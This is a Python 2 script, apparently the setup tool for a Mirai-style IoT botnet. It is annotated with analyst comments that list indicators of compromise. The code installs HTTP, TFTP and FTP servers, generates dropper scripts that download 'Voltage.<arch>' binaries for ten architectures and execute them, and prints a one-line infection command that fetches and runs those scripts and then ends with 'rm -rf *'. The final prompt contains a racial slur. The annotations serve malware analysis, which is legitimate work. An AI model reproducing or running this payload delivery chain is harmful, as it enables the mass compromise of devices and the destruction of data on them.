payload.py
import subprocess, sys, urllib
# Analyst note: module-level configuration for a script that turns the host it
# runs on into a download server for per-architecture binaries.
# The host's public IP is fetched over plain HTTP from api.ipify.org and is
# later concatenated, unescaped, into shell command strings and a config file.
# urllib.urlopen exists only in Python 2, so this file targets Python 2.
ip = urllib.urlopen('http://api.ipify.org').read()
# File name each fetched binary is copied to before it is executed.
exec_bin = "SSH"
# Prefix of the served binaries; the full names are bin_prefix + arch,
# e.g. "Voltage.x86". These names are usable as file and URL indicators.
bin_prefix = "Voltage."
# Directory component used in the HTTP download URLs (http://<ip>/bins/...).
bin_directory = "bins"
# Architecture suffixes; one download-and-run line is generated per entry.
archs = ["x86", #1
"mips", #2
"mpsl", #3
"arm4", #4
"arm5", #5
"arm6", #6
"arm7", #7
"ppc", #8
"m68k", #9
"sh4"] #10
# Hand a command string to the system shell (shell=True).
# The return code of subprocess.call is discarded, so a failed command is
# silent. Every caller builds cmd by string concatenation, including the
# remotely fetched `ip` value, with no quoting or validation.
def run(cmd):
subprocess.call(cmd, shell=True)
# Analyst note: this run installs and starts three file-serving daemons on the
# local host (HTTP via httpd, TFTP via xinetd + tftp-server, FTP via vsftpd).
# The use of yum and `service` suggests a RHEL/CentOS-style system - confirm.
# All command output is redirected to /dev/null, so nothing shows on the console.
# Host-side artefacts: the three package installs, /etc/xinetd.d/tftp and
# /etc/vsftpd/vsftpd-anon.conf.
print("Setting up HTTP TFTP and FTP for your payload")
print(" ")
run("yum install httpd -y &> /dev/null")
run("service httpd start &> /dev/null")
run("yum install xinetd tftp tftp-server -y &> /dev/null")
run("yum install vsftpd -y &> /dev/null")
run("service vsftpd start &> /dev/null")
# Overwrites /etc/xinetd.d/tftp: in.tftpd runs as root over UDP, is restricted
# to /var/lib/tftpboot by -s, and -c is also passed (in tftp-hpa that flag
# permits creation of new files - confirm for the installed tftpd).
run('''echo "service tftp
{
socket_type = dgram
protocol = udp
wait = yes
user = root
server = /usr/sbin/in.tftpd
server_args = -s -c /var/lib/tftpboot
disable = no
per_source = 11
cps = 100 2
flags = IPv4
}
" > /etc/xinetd.d/tftp''')
run("service xinetd start &> /dev/null")
# Writes an anonymous, read-only FTP configuration rooted at /var/ftp and bound
# to the fetched public IP on port 21. It is written to vsftpd-anon.conf;
# whether the vsftpd service actually loads that file is not shown here.
run('''echo "listen=YES
local_enable=NO
anonymous_enable=YES
write_enable=NO
anon_root=/var/ftp
anon_max_rate=2048000
xferlog_enable=YES
listen_address='''+ ip +'''
listen_port=21" > /etc/vsftpd/vsftpd-anon.conf''')
run("service vsftpd restart &> /dev/null")
run("service xinetd restart &> /dev/null")
# Analyst note: this run generates four shell scripts, one or two per transport:
#   /var/lib/tftpboot/lessie.sh and lessie2.sh (TFTP), /var/www/html/lessie.sh
#   (HTTP) and /var/ftp/lessie1.sh (FTP).
# Indicators visible in this block, on a device that runs one of the scripts:
#   - a copy of /bin/busybox placed in /tmp
#   - the chain `cd /tmp || cd /var/run || cd /mnt || cd /root || cd /`
#   - wget/curl/ftpget/tftp retrieval of files named Voltage.<arch>
#   - `chmod +x *` followed by execution of a file named SSH in that directory
#   - one such line per architecture, i.e. ten fetch attempts in a row
print("Creating .sh Bins")
print(" ")
run('echo "#!/bin/bash" > /var/lib/tftpboot/lessie.sh')
run('echo "ulimit -n 1024" >> /var/lib/tftpboot/lessie.sh')
run('echo "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/lessie.sh')
run('echo "#!/bin/bash" > /var/lib/tftpboot/lessie2.sh')
run('echo "ulimit -n 1024" >> /var/lib/tftpboot/lessie2.sh')
run('echo "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/lessie2.sh')
run('echo "#!/bin/bash" > /var/www/html/lessie.sh')
# As written, the next two lines append to the TFTP lessie2.sh a second time,
# so that file carries the ulimit/busybox lines twice; useful when matching
# recovered script contents against this generator.
run('echo "ulimit -n 1024" >> /var/lib/tftpboot/lessie2.sh')
run('echo "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/lessie2.sh')
run('echo "#!/bin/bash" > /var/ftp/lessie1.sh')
run('echo "ulimit -n 1024" >> /var/ftp/lessie1.sh')
run('echo "cp /bin/busybox /tmp/" >> /var/ftp/lessie1.sh')
# One appended line per architecture and per script. The four run() calls
# below all reference the loop variable i; the extraction lost the indentation
# that would mark them as the loop body.
for i in archs:
# HTTP variant: tries both wget and curl against http://<ip>/bins/Voltage.<arch>.
run('echo "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://' + ip + '/'+bin_directory+'/'+bin_prefix+i+'; curl -O http://' + ip + '/'+bin_directory+'/'+bin_prefix+i+';cat '+bin_prefix+i+' >'+exec_bin+';chmod +x *;./'+exec_bin+'" >> /var/www/html/lessie.sh')
# FTP variant: ftpget with anonymous/anonymous credentials on port 21.
run('echo "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; ftpget -v -u anonymous -p anonymous -P 21 ' + ip + ' '+bin_prefix+i+' '+bin_prefix+i+';cat '+bin_prefix+i+' >'+exec_bin+';chmod +x *;./'+exec_bin+'" >> /var/ftp/lessie1.sh')
# TFTP variants: the same fetch written in two client syntaxes (`-c get` and `-r ... -g`).
run('echo "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp ' + ip + ' -c get '+bin_prefix+i+';cat '+bin_prefix+i+' >'+exec_bin+';chmod +x *;./'+exec_bin+'" >> /var/lib/tftpboot/lessie.sh')
run('echo "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r '+bin_prefix+i+' -g ' + ip + ';cat '+bin_prefix+i+' >'+exec_bin+';chmod +x *;./'+exec_bin+'" >> /var/lib/tftpboot/lessie2.sh')
# Analyst note: final steps - restart the TFTP and HTTP services, persist a
# raised open-file limit for the current user, and print a one-line command.
run("service xinetd restart &> /dev/null")
run("service httpd restart &> /dev/null")
# Appends `ulimit -n 99999` to the invoking user's ~/.bashrc (a persistent
# host artefact on the serving machine).
run('echo -e "ulimit -n 99999" >> ~/.bashrc')
# Prints the command line in green (ANSI \x1b[0;32m ... \x1b[0m). It tries every
# transport for the lessie*.sh scripts and ends with `rm -rf` of those scripts
# followed by `rm -rf *` in the working directory, so on an affected device the
# on-disk scripts may already be gone; network and process telemetry are the
# more reliable evidence sources.
print("\x1b[0;32mPayload: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://" + ip + "/lessie.sh; curl -O http://" + ip + "/lessie.sh; chmod 777 lessie.sh; sh lessie.sh; tftp " + ip + " -c get lessie.sh; chmod 777 lessie.sh; sh lessie.sh; tftp -r lessie2.sh -g " + ip + "; chmod 777 lessie2.sh; sh lessie2.sh; ftpget -v -u anonymous -p anonymous -P 21 " + ip + " lessie1.sh lessie1.sh; sh lessie1.sh; rm -rf lessie.sh lessie.sh lessie2.sh lessie1.sh; rm -rf *\x1b[0m")
print("")
# raw_input is the Python 2 prompt call; it blocks until Enter is pressed.
raw_input("Cya nigga")